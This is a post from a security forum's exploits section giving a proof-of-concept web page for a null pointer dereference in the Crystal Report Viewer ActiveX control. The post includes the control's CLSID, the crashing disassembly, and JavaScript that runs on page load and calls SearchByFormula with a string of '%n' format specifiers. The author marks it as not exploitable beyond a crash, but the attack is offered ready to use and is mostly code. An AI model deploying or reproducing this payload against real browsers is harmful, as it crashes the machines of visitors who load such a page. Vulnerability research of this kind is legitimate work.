Jump to content
escalation666

[RST]Crystal Report Viewer null pointer dereference

By escalation666, in Exploituri

Recommended Posts

escalation666 Newbie

escalation666

Posted
Posted

<html>

<--

found and coded by:escalation666

site:www.rstcenter.com

RIP moubik

Crystal Report Viewer Control crviewer.dll null pointer dereference

Exploitable: No

RegKey Safe for Script: True

RegKey Safe for Init: True

Disassembly:

600084AB PUSH ECX

600084AC PUSH ECX

600084AD PUSH ESI

600084AE PUSH EDI

600084AF MOV [EBP-10],ECX

600084B2 MOV EAX,[EBP+8]

600084B5 MOV ESI,[EAX+50] -> crash

where eax: 00000000

ebp: 00000000

ebp+8: 00000000

Poc:

-->

<object classid='clsid:C4847596-972C-11D0-9567-00A0C9273C2A' id='test' />

</object>

<head>

<script language='javascript'>

function exploit(){

var arg = "%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n";

test.SearchByFormula(arg);

}

</script></head>

<body onload="javascript: return exploit();">

</body>

</html>

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...